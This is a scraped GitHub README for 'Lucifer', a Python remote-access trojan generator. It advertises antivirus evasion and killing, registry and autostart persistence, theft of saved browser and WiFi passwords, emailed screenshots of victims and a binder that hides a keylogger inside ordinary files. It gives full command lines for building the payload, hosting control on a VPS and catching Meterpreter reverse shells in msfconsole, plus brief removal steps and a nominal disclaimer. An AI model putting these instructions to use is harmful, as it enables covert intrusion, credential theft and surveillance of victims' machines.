forked from Malwareman007/Lucifer
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathREADME.tsx
350 lines (253 loc) · 14.1 KB
/
README.tsx
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
# Off:Off
<h1 align="center">Lucifer</h1>
<p align="center">
<img src="https://media3.giphy.com/media/l4FGFQHfrDnTalYvS/giphy.gif"/>
</p>
<p align="center">
<a href="https://python.org">
<img src="https://img.shields.io/badge/Python-3.7-green.svg">
</a>
<a href="https://github.com/malwareman007/thorse/blob/master/LICENSE">
<img src="https://img.shields.io/badge/License-BSD%203-lightgrey.svg">
</a>
<a href="https://github.com/malwareman007/thorse/releases">
<img src="https://img.shields.io/badge/Release-1.0-blue.svg">
</a>
<a href="https://github.com/malwareman007/thorse">
<img src="https://img.shields.io/badge/Open%20Source-%E2%9D%A4-brightgreen.svg">
</a>
</p>
---
---
<p align="center">
Lucifer is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.
</p>
***This small python script can do really awesome work.***
## Disclaimer
<p align="center">
:computer: This project was created only for good purposes and personal use.
</p>
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
## Features
- [x] Works on Windows/Linux
- [x] Notify New Victim Via Email
- [x] Undetectable
- [x] Does not require root or admin privileges
- [x] Persistence
- [x] Sends Screenshot of Victim PC's Screen via email
- [x] Give Full Meterpreter Access to Attacker
- [x] Didn't ever require metesploit installed to create trojan
- [x] Creates Executable Binary With Zero Dependencies
- [x] Create less size ~ 5mb payload with advance functionality
- [x] Obfusticate the Payload before Compiling it, hence Bypassing few more antivirus
- [x] Generated Payload is Encrypted with base64, hence makes extremely difficult to reverse engineer the payload
- [x] Function to Kill Antivirus on Victim PC and tries to disable the Security Center
- [x] Awesome Colourful Interface to generate payload
- [x] On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them
- [x] Able to add custom Icon to evil file
- [x] **Built-in Binder** which can bind Keylogger to **Any File** [.pdf, .txt, .exe etc], Running legitimate file on front end & evil codes in back-end as a service.
- [x] Checks for **Already Running Instance** on System, If running instance found, then only legitimate file is executed [**Multiple Instance Prohibiter**].
- [x] Attacker can Create/Compile for Both **Windows/Linux OS** Using Linux System, But Can only Create/Compile **Windows** Executable using Windows Machine
- [x] **Retrieves Saved Passwords** from victim System and sends it to Attacker.
| Supported Retrives, Tries to Retrive Saved Passwords from : |
| ----------------------------------------------------------- |
| Chrome Browser |
| WiFi |
#### Note: Custom Stealer is Coded, does not relies on LaZagne
## Tested On
[](https://www.kali.org) **Kali Linux - ROLLING EDITION**
[](https://www.microsoft.com/en-in/windows/) **Windows 11**
[](https://www.microsoft.com/en-in/windows/) **Windows 10**
[](https://www.microsoft.com/en-in/windows/) **Windows 8.1 - Pro**
[](https://www.microsoft.com/en-in/windows/) **Windows 7 - Ultimate**
## Following is the limitations of meterpreter payload generated using metasploit:-
* Have to run the Metasploit Listener before executing backdoor
* Backdoor itself don't become persistence, we have to use the post exploitation modules in order to make backdoor persistence.
And post exploitation modules can only be used after successful exploitation.
* Didn't Notify us whenever payload get executed on new system.
We all know how powerful the Meterpeter payload is but still the payload made from it is not satisfactory.
## Following are the features of this payload generator which will give you a good idea of this python script:-
* Uses Windows registry to become persistence in windows.
* Also manages to become persistence in linux system.
* Payload can run on LINUX as well as WINDOWS.
* Provide Full Access, as metasploit listener could be used as well as supports custom listener (You can Create Your Own Listener)
* Sends Email Notification, when ever payload runs on new system, with complete system info.
* Generates payload within 1 minute or ever less.
* Supports all meterpreter post exploitation modules.
* Payload Can be Created on Windows as well as Linux system.
## Prerequisite
- [x] Python 3.X
- [x] Few External Modules
## Please Note:
In Windows, Please Specify/Set Pyinstaller path in `Lucifer.py` [**Line 14**]
Default Path is this : `PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")`
**Change it according to your system**
## How To Use in Linux
```bash
# Install dependencies
$ Install latest python 3.x
# Navigate to the /opt directory (optional)
$ cd /opt/
# Clone this repository
$ git clone https://github.com/malwareman007/Lucifer.git
# Go into the repository
$ cd Lucifer
# Installing dependencies
$ bash installer_linux.sh
# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py
$ chmod +x Lucifer.py
$ python3 Lucifer.py --help
# Making Payload/RAT
$ python3 Lucifer.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 Lucifer.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# Making Payload/RAT with Custom Time to become persistence
$ python3 Lucifer.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10
Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico
```
## How To Use in VPS (Recommend)
```
# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc
# 2. Connect to your VPS Using SSH
$ ssh username@ip_address
# 3. Update Your Linux VPS
$ sudo apt update
# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"
# 5. Install gnupg package
$ sudo apt install gnupg
# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc
# 7. Update VPS
$ sudo apt update
# 8. Set Kali Priority
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"
# 9. Update VPS
$ sudo apt update
# 10. Install Metasploit Framework in VPS
$ sudo apt install -t kali-rolling metasploit-framework
# NOTE: Above Steps needs to be performed only for once
# 11. Install pip3
$ sudo apt install python3-pip
# 12. Clone this repository
$ git clone https://github.com/malwareman007/Lucifer.git
# 13. Go into the repository
$ cd Lucifer
# 14. Installing dependencies
$ bash installer_linux.sh
# 15. If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py
$ 16. chmod +x Lucifer.py
$ python3 Lucifer.py --help
# Making Payload/RAT (If you want to Compile RAT for Windows, then Build RAT on Windows Machine & Use VPS for Controlling RAT Remotely)
$ python3 Lucifer.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 Lucifer.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# Making Payload/RAT with Custom Time to become persistence
$ python3 Lucifer.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10
Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico
```
## How To Use in Windows
```bash
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clone https://github.com/malwareman007/Lucifer.git
# Go into the repository
$ cd Lucifer
# Installing dependencies
$ python -m pip install -r requirements.txt
# Open Lucifer.py in Text editor and Configure Line 15, set Pyinstaller path, Default Path is as follows :-
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
# Getting Help Menu
$ python Lucifer.py --help
# Making Payload/RAT
$ python Lucifer.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path
# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python Lucifer.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
# Making Payload/RAT binded with legitimate file [Any file .exe, .pdf, .txt etc]
$ python Lucifer.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt
Note: You can also use our custom icons from the icon folder, just use them like this --icon icon/pdf.ico
```
## Note:- Evil File will be saved inside dist/ folder, inside Lucifer/ folder
## Establishing Connection Using Msfconsole
* You Need to Install Metasploit-Framework on your system for establishing connection
* Recommended Settings, You can try to test it with any other payload in line 2
```
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 127.0.0.1
msf3> set LPORT 443
msf3> run
```
## How to Update
* Run updater.py to Update Autmatically or Download the latest Zip from this GitHub repo
* Note: Git Must be Installed in order to use updater.py
## Available Arguments
* Optional Arguments
| Short Hand | Full Hand | Description |
| ---------- | --------- | ----------- |
| -h | --help | show this help message and exit |
| -k KILL_AV |--kill_av KILL_AV | AntivirusKiller : Specify AV's .exe which need to be killed. Ex:- --kill_av cmd.exe |
| -t TIME_IN_SECONDS | --persistence TIME_PERSISTENT | Becoming Persistence After __ seconds. default=10 |
| -w | --windows | Generate a Windows executable. |
| -l | --linux | Generate a Linux executable. |
| -b file.txt | --bind LEGITIMATE_FILE_PATH.pdf | AutoBinder : Specify Path of Legitimate file. [**Supported OS : Windows**] |
| -s | --steal-password | Steal Saved Password from Victim Machine [**Supported OS : Windows**] |
| -d | --debug | Run Virus on Foreground |
#### Note : Either **-w/--windows** or **-l/--linux** must be specified
* Required Arguments
| Short Hand | Full Hand | Description |
| ---------- | --------- | ----------- |
| | --icon ICON | Specify Icon Path, Icon of Evil File [Note : Must Be .ico] |
| | --ip IP_ADDRESS | Email address to send reports to. |
| | --port PORT | Port of the IP Address given in the --ip argument. |
| -e EMAIL | --email EMAIL | Email address to send reports to. |
| -p PASSWORD | --password PASSWORD | Password for the email address given in the -e argument. |
| -o OUT | --out OUT | Output file name.|
## New Screenshots:
#### Getting Help

#### Running Lucifer.py Script

#### When RAT runs, it adds Registry to become persistence

#### Makes copy of itself and saved it inside Roming

#### Report sended by RAT

#### Getting Notification From Victim PC

## Contributors:
Currently this repo is maintained by me (malwareman007). But If you want to become contributor, then add some cool feature and make a pull request, I will review, and merge it this repo.
All contributor's pull request will be accepted if their pull request is worthy for this repo.
## TODO
- [ ] Add new features
- [ ] Contribute GUI
## Removing Lucifer in Windows:
#### Method 1:
* Go to start, type regedit and run the first program, this will open the registry editor.
* Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called winexplorer, right click this entry and select Delete.
* Go to your user path > AppData > Roaming, you’ll see a file named “explorer.exe”, this is the RAT, right click > Delete.
* Restart the System.
#### Method 2:
* Run "RemoveTHorse.bat" in Infected System and then restart the PC to stop the current Running Evil File.
## Removing Lucifer in Linux:
* Open Autostart file with any text editor,
****Autostart File Path: ~/.config/autostart/xinput.desktop****
* Remove these 5 lines:
[Desktop Entry]
Type=Application
X-GNOME-Autostart-enabled=true
Name=Xinput
Exec="destination_file_name"
* Note: **destination_file_name** is that name of evil_file which you gave
to your TrojanHorse using -o parameter
* Reboot your system and then delete the evil file stored this this below path
* Destination Path, where TrojanHorse is stored : **~/.config/xnput**
## More Features Coming Soon...
## TODO (Contributors are welcome)
* Add more browser password stealers
* GUI Development